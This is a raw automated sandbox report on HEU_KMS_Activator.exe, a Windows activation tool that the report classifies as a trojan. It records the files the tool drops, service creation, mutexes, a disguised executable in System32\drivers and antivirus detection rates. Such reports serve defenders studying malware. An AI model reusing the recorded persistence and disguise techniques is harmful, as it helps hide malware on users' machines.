Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\x64\msvcr100.dll
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\x86\SECOPatcher.dll
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\x64\SECOPatcher.dll
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\x86\SppExtComObjHook.dll
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\x64\SppExtComObjHook.dll
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\_temp07242019502489\ScriptDir.ini
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeFile deleted: C:\Windows\System32\drivers\DvLayout.exeJump to behavior
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeCode function: 1_2_004047211_2_00404721
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeCode function: 1_2_004069331_2_00406933
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_0068E0402_2_0068E040
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006DE0892_2_006DE089
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006802502_2_00680250
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006382D02_2_006382D0
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006D63152_2_006D6315
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_0067E6302_2_0067E630
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006CC7CB2_2_006CC7CB
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006CE7902_2_006CE790
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006C28072_2_006C2807
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_0065A8802_2_0065A880
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006C6E992_2_006C6E99
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006BCFE02_2_006BCFE0
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006C70CB2_2_006C70CB
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006BD1802_2_006BD180
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006812B02_2_006812B0
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006333702_2_00633370
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006C73302_2_006C7330
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006714202_2_00671420
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006812B02_2_006812B0
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006E563E2_2_006E563E
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006E575E2_2_006E575E
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_0063F7E02_2_0063F7E0
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_0065F7E02_2_0065F7E0
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006AB9602_2_006AB960
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006E39BB2_2_006E39BB
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006C3A202_2_006C3A20
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_00635A902_2_00635A90
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006E1F272_2_006E1F27
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C402503_2_00C40250
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C412B03_2_00C412B0
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00BF5A903_2_00BF5A90
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C9E0893_2_00C9E089
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C4E0403_2_00C4E040
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00BF82D03_2_00BF82D0
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C963153_2_00C96315
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C3E6303_2_00C3E630
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C8C7CB3_2_00C8C7CB
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C8E7903_2_00C8E790
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C1A8803_2_00C1A880
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C828073_2_00C82807
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C7E9BC3_2_00C7E9BC
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C82B793_2_00C82B79
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C86E993_2_00C86E99
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C82E233_2_00C82E23
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C7CFE03_2_00C7CFE0
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C870CB3_2_00C870CB
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C830EA3_2_00C830EA
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C7D1803_2_00C7D180
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C833A53_2_00C833A5
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00BF33703_2_00BF3370
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C873303_2_00C87330
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C314203_2_00C31420
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C412B03_2_00C412B0
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00CA563E3_2_00CA563E
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C1F7E03_2_00C1F7E0
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00BFF7E03_2_00BFF7E0
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00CA575E3_2_00CA575E
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00CA39BB3_2_00CA39BB
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C6B9603_2_00C6B960
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C83A203_2_00C83A20
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00CA1F273_2_00CA1F27
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: 11_2_0038211D11_2_0038211D
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: 11_2_0039C18411_2_0039C184
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: 11_2_0039C2A411_2_0039C2A4
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: 11_2_0038234F11_2_0038234F
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: 11_2_0037C44011_2_0037C440
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: 11_2_00394D3911_2_00394D39
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: 11_2_003945BA11_2_003945BA
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: 11_2_00398DAA11_2_00398DAA
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: 11_2_00387E3011_2_00387E30
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: 11_2_0037DE7011_2_0037DE70
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: 11_2_00385E9911_2_00385E99
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: 11_2_00381EEB11_2_00381EEB
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: 11_2_0039A72911_2_0039A729
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: 11_2_0037C7A011_2_0037C7A0
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00E827A017_2_00E827A0
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00EB216017_2_00EB2160
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00E8F2B017_2_00E8F2B0
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00EB327017_2_00EB3270
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00EA523017_2_00EA5230
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00EA433017_2_00EA4330
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00E9C4E017_2_00E9C4E0
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00E894C017_2_00E894C0
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00E9444017_2_00E94440
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00EC05EA17_2_00EC05EA
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00EC25F017_2_00EC25F0
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00EBB57F17_2_00EBB57F
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00ED551417_2_00ED5514
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00EAD61017_2_00EAD610
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00EB67E017_2_00EB67E0
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00EBB7B117_2_00EBB7B1
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00EC07B317_2_00EC07B3
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00EB58F017_2_00EB58F0
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00ECA89E17_2_00ECA89E
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00EBB9E317_2_00EBB9E3
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00EAB97017_2_00EAB970
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00E6AA8017_2_00E6AA80
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00E6BA7017_2_00E6BA70
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00EA6BF017_2_00EA6BF0
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00EA3BA017_2_00EA3BA0
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00EA1B7017_2_00EA1B70
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00EBBC4817_2_00EBBC48
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00EB5C5017_2_00EB5C50
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00ED6C2617_2_00ED6C26
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00E63DB017_2_00E63DB0
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00ED6D4617_2_00ED6D46
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00EB3D1B17_2_00EB3D1B
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00E61E8017_2_00E61E80
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00E98E9017_2_00E98E90
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00E7CE4017_2_00E7CE40
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00ED0F3917_2_00ED0F39
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_00403A7034_2_00403A70
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_00417BAE34_2_00417BAE
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0045E0C034_2_0045E0C0
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_004442E034_2_004442E0
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0046A2A034_2_0046A2A0
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0044A44034_2_0044A440
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0046A46034_2_0046A460
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0044E43034_2_0044E430
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_004465E034_2_004465E0
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_004285AD34_2_004285AD
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0044873034_2_00448730
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0044A7E034_2_0044A7E0
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0045683034_2_00456830
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0046A95034_2_0046A950
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_004469A034_2_004469A0
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_004729A334_2_004729A3
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0044CA4034_2_0044CA40
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0045EA6034_2_0045EA60
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_00454B1034_2_00454B10
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_00458B3034_2_00458B30
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_00472B3034_2_00472B30
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_00450BD034_2_00450BD0
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_00472C0B34_2_00472C0B
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_00456CF034_2_00456CF0
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_00434D2834_2_00434D28
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_00466E3034_2_00466E30
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0045105034_2_00451050
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0044715034_2_00447150
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0045917034_2_00459170
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_004311FE34_2_004311FE
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0046722034_2_00467220
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0046F31434_2_0046F314
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0044946034_2_00449460
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0046742034_2_00467420
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_004514F034_2_004514F0
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_004075F534_2_004075F5
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0045374034_2_00453740
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_004677D034_2_004677D0
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_004217DA34_2_004217DA
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0044192534_2_00441925
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0042DBB634_2_0042DBB6
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_00453CE034_2_00453CE0
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_00467DF034_2_00467DF0
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_00459E7034_2_00459E70
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0044BED034_2_0044BED0
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_00461EF034_2_00461EF0
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0045FE9034_2_0045FE90
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_00459F8034_2_00459F80
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeCode function: String function: 00405EFF appears 56 times
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: String function: 0037C240 appears 49 times
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: String function: 0046B890 appears 624 times
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: String function: 00407A18 appears 114 times
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: String function: 00C39A90 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: String function: 00C21F00 appears 253 times
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: String function: 00C27CA0 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: String function: 00C8AB00 appears 37 times
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: String function: 00C80610 appears 66 times
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: String function: 00C22050 appears 379 times
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: String function: 00C8F810 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: String function: 00667CA0 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: String function: 00679A90 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: String function: 00661F00 appears 252 times
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: String function: 00667C80 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: String function: 006CAB00 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: String function: 00662050 appears 379 times
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: String function: 006C0610 appears 58 times
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: String function: 006CF810 appears 49 times
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: String function: 00EAEAC0 appears 40 times
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: String function: 00E83110 appears 32 times
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: String function: 00E7F7B0 appears 328 times
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: String function: 00E844B0 appears 39 times
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: String function: 00E7F890 appears 265 times
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: String function: 00E84670 appears 34 times
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: String function: 00E83060 appears 50 times
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: String function: 00EB5660 appears 55 times
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHEU_KMS_Activator_v19.5.1T vs HEU_KMS_Activator.exe
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDvLayout.exe8 vs HEU_KMS_Activator.exe
Source: HEU_KMS_Activator.exe, 00000004.00000002.2510572326.0000000001B27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME vs HEU_KMS_Activator.exe
Source: HEU_KMS_Activator.exe, 00000004.00000003.1303436049.000000000BEE1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename7za.exe, vs HEU_KMS_Activator.exe
Source: HEU_KMS_Activator.exe, 00000004.00000002.2509398500.00000000018C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME^5 vs HEU_KMS_Activator.exe
Source: HEU_KMS_Activator.exe, 00000004.00000002.2509398500.00000000018C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs HEU_KMS_Activator.exe
Source: HEU_KMS_Activator.exe, 00000004.00000003.1303436049.000000000BEB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename7za.exe, vs HEU_KMS_Activator.exe
Source: HEU_KMS_Activator.exe.4.drBinary or memory string: OriginalFilenameHEU_KMS_Activator_v19.5.1T vs HEU_KMS_Activator.exe
Source: HEU_KMS_Activator.exe.1.drBinary or memory string: OriginalFilenameHEU_KMS_Activator_v19.5.1T vs HEU_KMS_Activator.exe
Source: HEU_KMS_Activator.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: KMDF_LOOK.sys.1.drBinary string: \Device\KMDF1L@UH
Source: classification engineClassification label: mal100.troj.evad.winEXE@64/79@5/5
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006A5920 GetLastError,_strncpy,FormatMessageA,_strrchr,_strrchr,GetLastError,SetLastError,2_2_006A5920
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeCode function: 1_2_0040425D GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,1_2_0040425D
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: GetModuleFileNameW,GetLastError,OpenSCManagerW,GetLastError,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,2_2_00641AF0
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: GetModuleFileNameW,GetLastError,OpenSCManagerW,GetLastError,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,3_2_00C01AF0
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: GetFullPathNameW,OpenSCManagerW,GetLastError,CloseServiceHandle,CreateServiceW,GetLastError,GetLastError,OpenServiceW,GetLastError,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,11_2_003746B0
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeCode function: 1_2_00402483 CoCreateInstance,MultiByteToWideChar,1_2_00402483
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_00641FC0 LoadResource,LockResource,SizeofResource,2_2_00641FC0
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_00631D50 GetModuleFileNameW,CreateEventW,StartServiceCtrlDispatcherW,CloseHandle,Sleep,CopyFileW,Sleep,GetLastError,__CxxThrowException@8,2_2_00631D50
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_00631D50 GetModuleFileNameW,CreateEventW,StartServiceCtrlDispatcherW,CloseHandle,Sleep,CopyFileW,Sleep,GetLastError,__CxxThrowException@8,2_2_00631D50
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00BF1D60 GetModuleFileNameW,CreateEventW,StartServiceCtrlDispatcherW,CloseHandle,Sleep,CopyFileW,Sleep,GetLastError,__CxxThrowException@8,3_2_00BF1D60
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeFile created: C:\Users\user\AppData\Local\Microsoft\Event ViewerJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeMutant created: \Sessions\1\BaseNamedObjects\DVLayout
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7376:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeMutant created: \Sessions\1\BaseNamedObjects\HEU KMS Activator
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4900:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6416:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2000:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1648:120:WilError_03
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeMutant created: \Sessions\1\BaseNamedObjects\DLreport
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4340:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2440:120:WilError_03
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeMutant created: \Sessions\1\BaseNamedObjects\GPTWin10
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6664:120:WilError_03
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeFile created: C:\Users\user~1\AppData\Local\Temp\nseB6AE.tmpJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCommand line argument: Nmn2_2_006E6CA0
Source: C:\Windows\System32\drivers\DvLayout.exeCommand line argument: n911_2_0039DFC0
Source: HEU_KMS_Activator.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: HEU_KMS_Activator.exeReversingLabs: Detection: 68%
Source: HEU_KMS_Activator.exeVirustotal: Detection: 73%
Source: wrme.exeString found in binary or memory: /install
Source: wrme.exeString found in binary or memory: -install
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeFile read: C:\Users\user\Desktop\HEU_KMS_Activator.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\HEU_KMS_Activator.exe "C:\Users\user\Desktop\HEU_KMS_Activator.exe"
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeProcess created: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exe
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe C:\Users\user~1\AppData\Local\Temp\J8156NOVDEC.exe
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeProcess created: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe C:\Users\user~1\AppData\Local\Temp\HEU_KMS_Activator.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
